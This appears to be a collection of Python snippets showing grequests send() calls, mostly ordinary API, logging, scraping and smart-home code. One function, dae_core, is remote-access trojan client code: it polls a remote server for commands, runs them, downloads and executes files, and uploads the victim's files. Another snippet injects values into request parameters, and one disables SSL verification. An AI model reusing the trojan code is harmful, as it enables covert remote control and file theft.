def test_async_request_with_exception_handler(self): good_url = 'https://github.com' bad_url = 'http://bad.url' timeout = 3 flag = {} def response_handler(response, **kwargs): flag['ok'] = True def exception_handler(req, exc): flag['error'] = True req = grequests.get(good_url, callback=response_handler, exception_handler=exception_handler) flag['ok'] = False flag['error'] = False grequests.send(req) time.sleep(timeout) self.assertTrue(flag['ok']) self.assertFalse(flag['error']) req = grequests.get(bad_url, callback=response_handler, exception_handler=exception_handler) flag['ok'] = False flag['error'] = False grequests.send(req) time.sleep(timeout) self.assertFalse(flag['ok']) self.assertTrue(flag['error'])
def createPoint(x, y): r = grequests.post('http://api.sconce.dev/jobs/1/points.json', data={ 'x': x, 'y': y }) grequests.send(r, grequests.Pool(10))
def emit(self, record): if record.levelno != logging.getLevelName("METRIC"): return try: metric_data = json.loads(record.getMessage()) metric_name = metric_data.pop("metric_name") value = metric_data.pop("value") additional_tags = ["service_name", "service_shard"] for tag in additional_tags: tag_value = getattr(record, tag, None) if tag_value is not None and tag not in metric_data: metric_data[tag] = tag_value tags = [ "%s=%s" % (str(a), str(b).replace(' ', '\ ')) for a, b in metric_data.iteritems() ] metric_id = ",".join([metric_name] + tags) timestamp = int(record.created * 1000 * 1000 * 1000) metric_data_string = "%s value=%s %s" % (metric_id, str(value), str(timestamp)) normal_logger = logging.getLogger() normal_logger.debug(metric_data_string) request = grequests.post( url=self.metric_server, data=metric_data_string, ) grequests.send(request) except KeyError: pass except: self.handleError(record)
def _handle_groupchat_message(self, msg): """Handles messages received from group chat""" chatrooms = self._storage.get_chatrooms() try: data = chatrooms[msg['mucroom']] # create message message = { 'from': unicode(msg['mucnick']), 'room': unicode(msg['mucroom']), 'text': msg['body'], 'received': datetime.now() } postdata = {k: http_additional_serialize(v) for k, v in message.iteritems()} # send message to postback_url try: r = grequests.post(data['url'], data=postdata) grequests.send(r) except TypeError: pass except KeyError: pass
def push(key, payload, pool): #logging.debug("+++++ Pushing: " + key + "\n") # TODO fetch date of resource somehow, otherwise server will use its own time params={'key':key} #asynchronus put-request req = grequests.put(apiURI, params=params, headers=header, data=payload, hooks={'response': printResponse}) grequests.send(req, pool)
def tools_send_door_state(self): print("Updating Jeedom") req = grequests.get( "%s%s%s" % (self.CONF["JEEDOM"]["PROTOCOL"], self.CONF["JEEDOM"]["HOST"], self.CONF["JEEDOM"]["API_URL"].replace( "{key}", self.CONF["JEEDOM"]["API_KEY"]).replace( "{id}", self.CONF["JEEDOM"]["CMD_ID"][self.door_state]))) grequests.send(req, grequests.Pool(1))
def append_comments(parent): if "kids" in parent: pool = grequests.Pool(100) for i, kid_id in enumerate(parent["kids"]): kid_url = "{}{}.json".format(api_item_url, kid_id) request = grequests.get(kid_url, hooks={ "response": append_decorator(append_comment, parent, i) }) grequests.send(request, pool) pool.join()
def get_request(url, auth, headers=None): tx = ty = 1 while True: try: request = grequests.get(url, auth=auth, headers=headers, session=SESSION) grequests.send(request, POOL).join() r = request.response except: pass else: break sleep(tx) tx, ty = ty, tx + ty return r
def answer_received(self, data): question, answer = data log.debug('Answer received: %s' % repr(answer)) # send answer to `postback_url` try: if question['postback_url']: # serialize values inside the dictionary postdata = {k: http_additional_serialize(v) for k, v in answer.iteritems()} r = grequests.post(question['postback_url'], data=postdata) grequests.send(r) except KeyError: pass
def queue_fetch_image(self, iword, words): cached, url, destpath = self.fetcher.create_request(words[iword]) if cached: self.add_to_fetched(AsyncImageFetcher.RequestedImage( None, iword, destpath, words)) else: # put the request in a structure with the word and extradata if not self.requests.has_key(url): req = grequests.get(url, timeout=BingImageFetcher.TIMEOUT, hooks={'response': [self.on_response]}) self.requests[url] = AsyncImageFetcher.RequestedImage( req, iword, destpath, words) grequests.send(req, grequests.Pool(1))
def append_comments(parent): if "kids" in parent: pool = grequests.Pool(100) for i, kid_id in enumerate(parent["kids"]): kid_url = "{}{}.json".format(api_item_url, kid_id) request = grequests.get(kid_url, hooks={ "response": append_decorator( append_comment, parent, i) }) grequests.send(request, pool) pool.join()
def log_requests_response(es_url, response): """ Log the response from a FHIR query. Args: es_url (string): The ElasticSearch endpoint. response (requests.models.Response): The resposne to log. """ payload = { 'request': _clean(response.request), 'response': _clean(response), 'now': datetime.datetime.now().isoformat(), } # Use the asyncronous grequests library because we don't need a response. req = grequests.post(es_url, data=json.dumps(payload)) grequests.send(req)
def test_fetch_cards_sending_requests_by_batches_not_blocking_for_responses(): """ Send requests but don't block for the response. Use a request pool to keep a threshold of maximum number of requests. Use a callback to get notified of the response. """ urls = [mtgurl.make_vanilla_url(cardname) for cardname in CARDS] reqs = (grequests.head(url, allow_redirects=True, callback=_on_response) for url in urls) pool = grequests.Pool(30) for req in reqs: grequests.send(req, pool) # Don't exit until we received the responses, otherwise we may lose some of them import time time.sleep(20)
def make_requests_r(self, rlist, count=0): failed = [] if count < 1: pool = grequests.Pool(self.limit) elif count < 2: time.sleep(10) pool = grequests.Pool(self.limit/2) (r.rerequest() for r in rlist) elif count < 3 or count > 3: time.sleep(10) pool = grequests.Pool(1) (r.rerequest() for r in rlist) #Hack to turn off ssl certs for r in rlist: r.request.session.verify = False jobs = [grequests.send(r.request, pool, stream=False) for r in rlist] grequests.gevent.joinall(jobs) for r in rlist: if not r.response: print "Request: " + r.url + " failed[" + str(count) + "]" failed.append(r) return failed
def _handle_requests( self, tasks: Iterable[AzureLogRecord], stream: bool = False, exception_handler: Callable = None, gtimeout: Optional[int] = None, ) -> None: """Concurrently handles a collection of AzureLogRecords to convert the requests to responses. :param tasks: a collection of AzureLogRecord objects. :param stream: If True, the content will not be downloaded immediately. :param exception_handler: Callback function, called when exception occured. Params: Request, Exception :param gtimeout: Gevent joinall timeout in seconds. (Note: unrelated to requests timeout) """ tasks = list(tasks) pool = grequests.Pool(self._configuration.max_concurrent_requests) jobs = [grequests.send(rec.log_request, pool, stream=stream) for rec in tasks] grequests.gevent.joinall(jobs, timeout=gtimeout) for record in tasks: if record.log_request.response is not None: record.log_response = record.log_request.response elif exception_handler and hasattr(record.log_request, "exception"): record.log_response = exception_handler(record.log_request, record.log_request.exception) else: record.log_response = None
def map(requests, stream=False, size=None, exception_handler=None, gtimeout=None, success_handler=None): """Concurrently converts a list of Requests to Responses. :param requests: a collection of Request objects. :param stream: If True, the content will not be downloaded immediately. :param size: Specifies the number of requests to make at a time. If None, no throttling occurs. :param exception_handler: Callback function, called when exception occured. Params: Request, Exception :param gtimeout: Gevent joinall timeout in seconds. (Note: unrelated to requests timeout) :param success_handler: Callback function, called when secceed. Params: Request """ requests = list(requests) pool = grequests.Pool(size) if size else None jobs = [grequests.send(r, pool, stream=stream) for r in requests] grequests.gevent.joinall(jobs, timeout=gtimeout) ret = [] for request in requests: if request.response is not None: ret.append(request.response) success_handler and success_handler(request) elif exception_handler and hasattr(request, 'exception'): ret.append(exception_handler(request, request.exception)) else: ret.append(None) return ret
def fetch_address(self, uprn): print('fetching address ' + uprn) address_req = grequests.get( 'https://address.discovery.openregister.org/record/%s.json' % uprn) address_resp = grequests.send(address_req, self.pool).get().response if address_resp.status_code == 404: print("WARNING: uprn %s resulted in 404" % uprn) return address = address_resp.json() print('fetching street ' + address['street']) street_req = grequests.get( 'https://street.discovery.openregister.org/record/%s.json' % address['street']) street = grequests.send(street_req, self.pool).get().response.json() address['street'] = street return address
def send_alarm_off(): global last_sent_status_was_on if last_sent_status_was_on: print("Alarm OFF") _ = grequests.send(grequests.get(f"https://{IP}/off"), grequests.Pool(1)) last_sent_status_was_on = False
def send_alarm_on(): global last_sent_status_was_on if not last_sent_status_was_on: print("Alarm ON") _ = grequests.send(grequests.get(f"https://{IP}/on"), grequests.Pool(1)) last_sent_status_was_on = True
def log_extra_data(self, params, campaign, request, to_phone, call_index): debug_mode = self.debug_mode def finished(res, **kwargs): if debug_mode: print "FFTF Extra Data log call complete: %s" % res ip = hashlib.sha256(request.values.get("ip_address", "")).hexdigest() user_phone = params.get('userPhone', None) org = params.get('org', 'fftf') if not user_phone: user_phone = request.values.get('From', '+15555555555')[-10:] data = { 'key': self.api_key, 'campaign_id': campaign['id'], 'from_phone_number': string.replace(user_phone, "-", ""), 'to_phone_number': string.replace(to_phone, "-", ""), 'ip_address': ip, 'call_index': call_index, 'org': org } if self.debug_mode: print "FFTF Log Extra Data sending: %s" % data url = 'https://queue.fightforthefuture.org/log_phone_call' req = grequests.post(url, data=data, hooks=dict(response=finished)) job = grequests.send(req, grequests.Pool(self.pool_size)) return
def log_extra_data(self, params, campaign, request, to_phone, call_index): debug_mode = self.debug_mode def finished(res, **kwargs): if debug_mode: print "FFTF Extra Data log call complete: %s" % res ip = hashlib.sha256(request.values.get("ip_address", "")).hexdigest() user_phone = params.get('userPhone', None) if not user_phone: user_phone = request.values.get('From', '+15555555555')[-10:] data = { 'key': self.api_key, 'campaign_id': campaign['id'], 'from_phone_number': string.replace(user_phone, "-", ""), 'to_phone_number': string.replace(to_phone, "-", ""), 'ip_address': ip, 'call_index': call_index } if self.debug_mode: print "FFTF Log Extra Data sending: %s" % data url = 'https://queue.fightforthefuture.org/log_phone_call' req = grequests.post(url, data=data, hooks=dict(response=finished)) job = grequests.send(req, grequests.Pool(self.pool_size)) return
def recognize(self, trigger_id, audio_data): url = 'https://api.wit.ai/speech?v=20160526' headers = {'Authorization': 'Bearer '+self.access_token, 'Content-Type': _CONTENT_TYPE} callback = lambda r, *args, **kwargs: self.response_callback(trigger_id, r, *args, **kwargs) hooks = {'response': [callback]} req = grequests.post(url, headers=headers, data=audio_data, hooks=hooks, timeout=10) job = grequests.send(req, self.request_pool) self.logger.debug("request sent")
def teardown_request(self, exception): # Send stathat requests only if there were no unhandled exceptions if exception: return # Send stathat requests req = dict( ezkey=self.ez_key, data=g._stathat_data, ) if use_grequests: requests.send(requests.post( self.url, data=json.dumps(req), session=self.session, )) else: self.session.post(self.url, data=json.dumps(req))
def create_database(self, dbname, stream=False, size=None): r = requests.post(self.db_url(''), data={'db-name':dbname}) if gevent: pool = Pool(size) if size else None jobs = [requests.send(r, pool, stream=stream)] gevent.joinall(jobs) r = r.response assert r.status_code in (200, 201), r.text return Database(dbname, self)
def create_database(self, dbname, stream=False, size=None): r = requests.post(self.db_url(''), data={'db-name': dbname}) if gevent: pool = Pool(size) if size else None jobs = [requests.send(r, pool, stream=stream)] gevent.joinall(jobs) r = r.response assert r.status_code in (200, 201), r.text return Database(dbname, self)
def entity(self, dbname, eid, stream=False, size=None): r = requests.get(self.db_url(dbname) + '/-/entity', params={'e':eid}, headers={'Accept':'application/edn'}) if gevent: pool = Pool(size) if size else None jobs = [requests.send(r, pool, stream=stream)] gevent.joinall(jobs) r = r.response assert r.status_code == 200 return loads(r.content)
def req_task(self, trigger_id, text): url = 'https://api.wit.ai/message?v=20160526&q=' + quote(text) self.logger.debug('request URL=%s' % url) headers = {'Authorization': 'Bearer ' + self.access_token} callback = lambda r, *args, **kwargs: self.response_callback( trigger_id, r, *args, **kwargs) hooks = {'response': [callback]} req = grequests.get(url, headers=headers, hooks=hooks, timeout=10) job = grequests.send(req, self.request_pool) time.sleep(5) # FIXME: necessary to receive response callback
def entity(self, dbname, eid, stream=False, size=None): r = requests.get(self.db_url(dbname) + '/-/entity', params={'e': eid}, headers={'Accept': 'application/edn'}) if gevent: pool = Pool(size) if size else None jobs = [requests.send(r, pool, stream=stream)] gevent.joinall(jobs) r = r.response assert r.status_code == 200 return loads(r.content)
def transact(self, dbname, data, stream=False, size=None): data = '[%s\n]' % '\n'.join(data) r = requests.post(self.db_url(dbname)+'/', data={'tx-data':data}, headers={'Accept':'application/edn'}) if gevent: pool = Pool(size) if size else None jobs = [requests.send(r, pool, stream=stream)] gevent.joinall(jobs) r = r.response assert r.status_code in (200, 201), (r.status_code, r.text) return loads(r.content)
def turnLightOff(self, deviceId): # The grequests library sends the request as soon as we create "job" below. We then yield to the greenlet every hundredth of a second # in the main update method to ensure we capture the result. req = grequests.put( 'http://{ip}/api/{username}/lights/{devId}/state'.format( ip=hub['IP'], username=hub['username'], devId=deviceId), callback=printStatus, data='{"on":false}', timeout=4) job = grequests.send(req, grequests.Pool(1)) job.link_exception(lambda *kwargs: sys.stdout.write( "There was an exception with the Hue request"))
def transact(self, dbname, data, stream=False, size=None): data = '[%s\n]' % '\n'.join(data) r = requests.post(self.db_url(dbname) + '/', data={'tx-data': data}, headers={'Accept': 'application/edn'}) if gevent: pool = Pool(size) if size else None jobs = [requests.send(r, pool, stream=stream)] gevent.joinall(jobs) r = r.response assert r.status_code in (200, 201), (r.status_code, r.text) return loads(r.content)
def fetch(self, url=''): """ Main method for retriever class. It loads a file and lets the processing of response to another method :param url: the url that is going to be retrieved :return: The task (grequests.send response) to be evaluated if needed """ self.print("Retrieving data from url: '{url}'".format(url=url)) if url: request = grequests.get(url, hooks=dict(response=self.process_response)) task = grequests.send(request, self.pool) return task
def get_player_rsp(player_urls): player_rsp_pool = grequests.Pool(len(player_urls)) for player_url in player_urls: player_url = player_url.strip() # remove the newline at the end # fetch player_id for this guy player_id = re.findall(r'\d+', player_url)[0] # fetch RSP using sale URL sale_url = "http://hitwicket.com/player/sell/{0}".format(player_id) req = grequests.get( sale_url, headers=headers, cookies=cookies, hooks={'response': [parse_rsp_factory(player_url=player_url)]}) grequests.send(req, player_rsp_pool) print "waiting for responses for 5 seconds..." time.sleep(5) return player_rsp
def turnLightOff(self, deviceId): # The grequests library sends the request as soon as we create "job" below. We then yield to the greenlet every hundredth of a second # in the main update method to ensure we capture the result. base64string = base64.encodestring( '%s:%s' % (hub['username'], hub['password'])).replace('\n', '') req = grequests.get( 'http://{ip}/3?0262{devId}0F13FF=I=3'.format(ip=hub['IP'], devId=deviceId), callback=printStatus, timeout=4, headers={"Authorization": "Basic %s" % base64string}) job = grequests.send(req, grequests.Pool(1)) job.link_exception(lambda *kwargs: sys.stdout.write( "There was an exception with the Insteon request"))
def handler(response, *args, **kwargs): if response.status_code != 200: # Need to track redirects to determine which query originated response. # The name of the beer could be extracted from the final page but the # exact name may differ which will cause issues as the name is used as # a dictionary key. if not full_url_re.match(response.headers['Location']): location = urllib.parse.urljoin(domain, response.headers['Location']) else: location = response.headers['Location'] redirects[location] = response.url return if not landed_on_profile(response): print("landed on search page: URL:", response.url) profile_urls = profile_url_re.findall(response.text) # TODO if profile_urls: # Naively choose profile from results profile_url = profile_urls[0] if not full_url_re.match(profile_url): location = urllib.parse.urljoin(domain, profile_url) else: location = profile_url redirects[location] = response.url req = grequests.get(urllib.parse.urljoin(domain, profile_url), callback=handler) to_fetch.append(grequests.send(req)) else: og_url = reverse_redirects(response.url) parsed = urllib.parse.urlparse(og_url) q = urllib.parse.parse_qs(parsed.query)['q'][0] no_results.append(q) else: print("landed on profile: URL:", response.url) score = parse_rating(response) brewery = parse_brewery(response) og_url = reverse_redirects(response.url) parsed = urllib.parse.urlparse(og_url) q = urllib.parse.parse_qs(parsed.query)['q'][0] global ratings beer = next(b for b in ratings if b['clean_text'] == q) beer["link"] = response.url beer["rating"] = score beer["rating_count"] = parse_rating_count(response) beer["brewery"] = brewery beer["name"] = parse_name(response) beer["style"] = parse_style(response)
def create_index(self, raw_sentences_fpath, output_fpath): num = 0 req_nmbr = 0 output_f = codecs.open(output_fpath, "w", "utf-8") with codecs.open(raw_sentences_fpath, "r", "utf-8") as input_f: for i, line in enumerate(input_f): if True : if i % BATCH_SIZE == 0 and i != 0: print('{} Request'.format(i)) output_f.close() self.create_request(output_fpath) output_f = codecs.open(output_fpath, "w", "utf-8") num = 0 if len(self._requests) == FIRE_AFTER: # resp = grequests.imap(self._requests, exception_handler=self.e_handler) # for response in resp: # print(response.status_code) for i, req in enumerate(self._requests): print('{} Request {}'.format( req_nmbr, str(datetime.now().strftime( '%H:%M')))) req_nmbr = req_nmbr+1 grequests.send(req, POOL) # print(resp) self._requests = [] print(self._get_meta(), file=output_f) print(self._create_document(line), file=output_f) num += 1 elif i % (BATCH_SIZE*10) == 0: print('Skipped {}/{} ({:2.2f})'.format(i,START_INDEX,(i/START_INDEX))) print("*") self.create_request(output_fpath) output_f.close()
def query(self, dbname, query, extra_args=[], history=False, stream=False, size=None): args = '[{:db/alias ' + self.storage + '/' + dbname if history: args += ' :history true' args += '} ' + ' '.join(str(a) for a in extra_args) + ']' r = requests.get(urljoin(self.location, 'api/query'), params={'args' : args, 'q':query}, headers={'Accept':'application/edn'}) if gevent: pool = Pool(size) if size else None jobs = [requests.send(r, pool, stream=stream)] gevent.joinall(jobs) r = r.response assert r.status_code == 200, r.text return loads(r.content)
def async_request(handler_name): global outstanding r = grequests.post('http://%s:8080/runLambda/%s' % (config['host'], handler_name), headers=HEADERS, data=json.dumps({"name": "Alice"}), hooks=dict(response=async_response)) job = grequests.send(r, grequests.Pool(1)) with async_lock: outstanding += 1 return
def make_request(self,value="",case=None,rval=None,debug=False): ''' Make a request. The value specified will be compiled/rendered into all Query objects in the request. If case and rval are specified the response will be appended to the list of values for the specified case. if return_case is True then we return the case rather than the rval. this is only really used for recursing by _test in the case of an error. Depth keeps track of recursion depth when we make multiple requests after a failure. ''' new_request = copy(self.request) #iterate over the __dict__ of the request and compile any elements that are #query objects. for elt in [q for q in new_request.__dict__ if isinstance(new_request.__dict__[q],Query)]: opts = new_request.__dict__[elt].get_options() for opt in opts: opts[opt] = value new_request.__dict__[elt].set_options(opts) new_request.__dict__[elt] = new_request.__dict__[elt].render() if debug: print "Injecting into '%s' parameter" % elt print "It looks like this: %s" % new_request.__dict__[elt] #send request. glet = grequests.send(new_request) glet.join() if not glet.get() and type(new_request.response.error) is requests.exceptions.ConnectionError: raise utilities.SendRequestFailed("looks like you have a problem") #see if the response was 'true' if case is None: case = self._test(new_request.response) rval = self.cases[case]['rval'] if debug and case: print "we will be treating this as a '%s' response" % case print "for the sample requests, the response's '%s' were the following :\n\t%s" % (self.comparison_attr,self.cases[case]['values']) print "\n" self._process_response(case,rval,new_request.response) return self.cases[case]['rval']
def get_async_web_response(url, method='GET', params=None, headers=None, encode=False, verify=None, use_verify=False, callback=None): import grequests # make a string with the request type in it: response = None request = None try: if 'POST' == method: if use_verify: request = grequests.post(url, data=params, headers=headers, verify=verify, callback=callback) else: request = grequests.post(url, data=params, headers=headers, callback=callback) else: request = requests.get(url, data=params, headers=headers, callback=callback) if request: response = grequests.send(request, grequests.Pool(1)) return response else: return response except: return response
def post_to_leaderboard(self, fftf_campaign, stat, data, host, session): debug_mode = self.debug_mode def finished(res, **kwargs): if debug_mode: print "FFTF Leaderboard call complete: %s" % res data = { 'campaign': fftf_campaign, 'stat': stat, 'data': data, 'host': host, 'session': session } if self.debug_mode: print "FFTF Leaderboard sending: %s" % data url = 'https://leaderboard.fightforthefuture.org/log' req = grequests.post(url, data=data, hooks=dict(response=finished)) job = grequests.send(req, grequests.Pool(self.pool_size)) return
def query(self, dbname, query, extra_args=[], history=False, stream=False, size=None): args = '[{:db/alias ' + self.storage + '/' + dbname if history: args += ' :history true' args += '} ' + ' '.join(str(a) for a in extra_args) + ']' r = requests.get(urljoin(self.location, 'api/query'), params={ 'args': args, 'q': query }, headers={'Accept': 'application/edn'}) if gevent: pool = Pool(size) if size else None jobs = [requests.send(r, pool, stream=stream)] gevent.joinall(jobs) r = r.response assert r.status_code == 200, r.text return loads(r.content)
def _request(self, url, callback, pool): req = grequests.get(url, hooks=dict(response=callback), verify=False) grequests.send(req, pool)
def dae_core(): global working_directory1 global caesar_folder global delay handshake_req() no_response = 0 subprocesses = [] while 1: # Checking if some subprocess has terminated if subprocesses != []: non_terminated = [] for process in subprocesses: # If process has terminated: if process[0].poll() != None: out = process[0].stdout.read() err = process[0].stderr.read() output = err if err != '' else out command = process[1]['command'] task_id = process[1]['task_id'] working_directory1 = process[1]['wd'] r = requests.post (caesar_folder + '/target/output.php', data={'unique_id': unique_id, 'command': command, 'task_id': task_id, 'output': output, 'wd': quote(working_directory1)}) else: non_terminated.append (process) subprocesses = non_terminated non_terminated = [] # Check if there are new commands to execute r = requests.post (caesar_folder + '/target/tasks.php', data={'unique_id': unique_id}) response = r.text # If the response from the server is not empty if response != '': # Splitting the response in order to get a list of commands to execute (and their identifiers) commands = split_response (response, '<command>', '</command>') ids = split_response (response, '<task_id>', '</task_id>') # Executing all commands contained in the list for command, task_id in zip(commands, ids): # If the user want a remote pseudo-connection if command == 'connect': delay = 1 output = 'connected' elif command == 'exit': delay = 10 output = 'exit' elif command == 'help': shell_help_link = caesar_folder + '/shell_help.txt' help_result = requests.get(shell_help_link).text output = help_result elif command == 'shutdown': subprocess.call('shutdown -s -t 5 -f',shell=True) output = '[*] Target PC Will Shutdown in 5 sec.' elif command == 'restart': subprocess.call('shutdown -r',shell=True) output = '[*] Target PC will restart in 5 sec.' elif command == 'logoff': subprocess.call('shutdown -l',shell=True) output = '[*] Target PC Will Log Off in 5 sec.' elif command.startswith('show.'): current_user = getpass.getuser() to_show = command.split('.') subprocess.call('msg ' + current_user + ' ' + to_show[1],shell=True) output = '[*] The massege will be shown to victim for 60 sec.' elif command.startswith('cd '): try: directory = command.replace('cd ', '') os.chdir(directory) working_directory1 = os.getcwd() output = '' except OSError as e: output = e.strerror + "\n" elif command.startswith('download_from_web '): link_to_down = command.split(' ') download_link = link_to_down[1] downloaded_file = download_file(download_link) output = '[*] ' + downloaded_file + ' Is Downloaded.' elif command.startswith('dae '): link_to_down = command.split(' ') download_link = link_to_down[1] downloaded_file = download_file(download_link) working_directory1 = os.getcwd() file_to_execute = working_directory1 + '\\' + downloaded_file subprocess.call(file_to_execute, shell=True) output = '[*] ' + file_to_execute + ' Is executed.' # If the attacker want the victim to upload a file to the remote server elif command.startswith('download '): filename = command.replace ('download ', '') if os.path.isfile(filename): files = {'file_to_upload': open(filename,'rb')} # Start the download without blocking the process r = grequests.post(caesar_folder + '/target/upload.php', data={'unique_id': unique_id, 'command': command, 'task_id': task_id}, files=files) job = grequests.send(r, grequests.Pool(1)) output = 'The file is being uploaded to the server' else: output = 'Inexistent file..' else: if os.name == 'nt': process = subprocess.Popen (command.split(), stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, shell=True) else: process = subprocess.Popen ([command], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, shell=True, close_fds=True) # Time for the subprocess to spawn sleep (0.5) # If the execution of the process has terminated immediately if process.poll() != None: out = process.stdout.read() err = process.stderr.read() output = err if err != '' else out # Else add the process to the list of non-terminated subprocesses else: new_subprocess = [] # Appending to the list of subprocesses the instance of subprocess new_subprocess.append(process) # Appending to the list of subprocesses a dictionary containing metadata of the process new_subprocess.append({'command' : command, 'task_id' : task_id, 'wd' : working_directory1}.copy()) subprocesses.append(new_subprocess) output = 'executing' # Send the output to the server r = requests.post (caesar_folder + '/target/output.php', data={'unique_id': unique_id, 'command': command, 'task_id': task_id, 'output': output, 'wd': quote(working_directory1)}) sleep (delay) else: # If the attacker is running a pseudo-interactive shell and he's not issuing commands if (delay != 10): # Increment the number of no-responses no_response += 1 # If there are too many no-responses from the server reset the delay (close the interactive-shell) if no_response == 60: delay = 10 no_response = 0 sleep (delay)
def pushWithFile(key, filePath, pool): params={'key':key} req = grequests.put(apiURI, params=params, headers=header, data=open(filePath, 'rb'), hooks={'response': printResponse}) grequests.send(req, pool)
def async_acquire_current_image(cam_url, save_path): print("Async call to {}".format(cam_url)) req = grequests.get(cam_url, hooks=dict(response=make_callback(save_path))) glet = grequests.send(req, grequests.Pool(50)) glet.run() return glet
def notifyPutResponse(response, *args, **kwargs): print('PUT response:', response.text) update_period = 0.25 last_master_update = 0 last_locator_update = 0 s = grequests.Session() # Thank you https://stackoverflow.com/questions/16015749/in-what-way-is-grequests-asynchronous while True: if time.time() > last_locator_update + update_period: last_locator_update = time.time() url = gpsUrl + "/api/v1/position/global" print('requesting data from', url) request = grequests.get(url, session=s, hooks={'response': processLocatorPosition}) job = grequests.send(request) if time.time() > last_master_update + update_period: last_master_update = time.time() url = gpsUrl + "/api/v1/position/master" print('requesting data from', url) request = grequests.get(url, session=s, hooks={'response': processMasterPosition}) job = grequests.send(request) try: datagram = sockit.recvfrom(4096) recv_payload = json.loads(datagram[0]) # Send depth/temp to external/depth api ext_depth = {} ext_depth['depth'] = max(min(100, recv_payload['depth']), 0)
def crawlURL(self, url): headers = { 'User-Agent': random.choice(UserAgents) } req = grequests.get(url, headers=headers, hooks=dict(response=self.done_loading)) grequests.send(req, grequests.Pool(1))